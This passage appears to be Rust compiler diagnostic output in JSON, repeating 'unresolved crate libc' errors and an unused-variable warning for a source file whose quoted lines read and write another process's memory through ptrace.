\u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4120,"byte_end":4124,"line_start":127,"line_end":127,"column_start":59,"column_end":63,"is_primary":true,"text":[{"text":" let ptr = &val as *const libc::c_long as *mut libc::c_void;","highlight_start":59,"highlight_end":63}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:127:59\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m127\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &val as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4184,"byte_end":4188,"line_start":128,"line_end":128,"column_start":51,"column_end":55,"is_primary":true,"text":[{"text":" ptrace::write(pid, start_addr as *mut libc::c_void, ptr)?;","highlight_start":51,"highlight_end":55}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:128:51\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m128\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::write(pid, start_addr as *mut libc::c_void, ptr)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4565,"byte_end":4569,"line_start":138,"line_end":138,"column_start":73,"column_end":77,"is_primary":true,"text":[{"text":" let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };","highlight_start":73,"highlight_end":77}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:138:73\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m138\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4706,"byte_end":4710,"line_start":141,"line_end":141,"column_start":24,"column_end":28,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":28}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing one of these type aliases","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::os::raw::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use core::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `c_long`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":4706,"byte_end":4712,"line_start":141,"line_end":141,"column_start":24,"column_end":30,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":30}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:141:24\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m141\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let new_word = libc::c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing one of these type aliases\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::os::raw::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use core::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if you import `c_long`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m141\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0m let new_word = \u001b[0m\u001b[0m\u001b[38;5;9mlibc::\u001b[0m\u001b[0mc_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m141\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ \u001b[0m\u001b[0m let new_word = c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4801,"byte_end":4805,"line_start":143,"line_end":143,"column_start":43,"column_end":47,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":43,"highlight_end":47}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:143:43\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m143\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4822,"byte_end":4826,"line_start":143,"line_end":143,"column_start":64,"column_end":68,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":64,"highlight_end":68}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:143:64\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m143\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4888,"byte_end":4892,"line_start":144,"line_end":144,"column_start":53,"column_end":57,"is_primary":true,"text":[{"text":" ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;","highlight_start":53,"highlight_end":57}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:144:53\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m144\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1222,"byte_end":1223,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1222,"byte_end":1223,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m 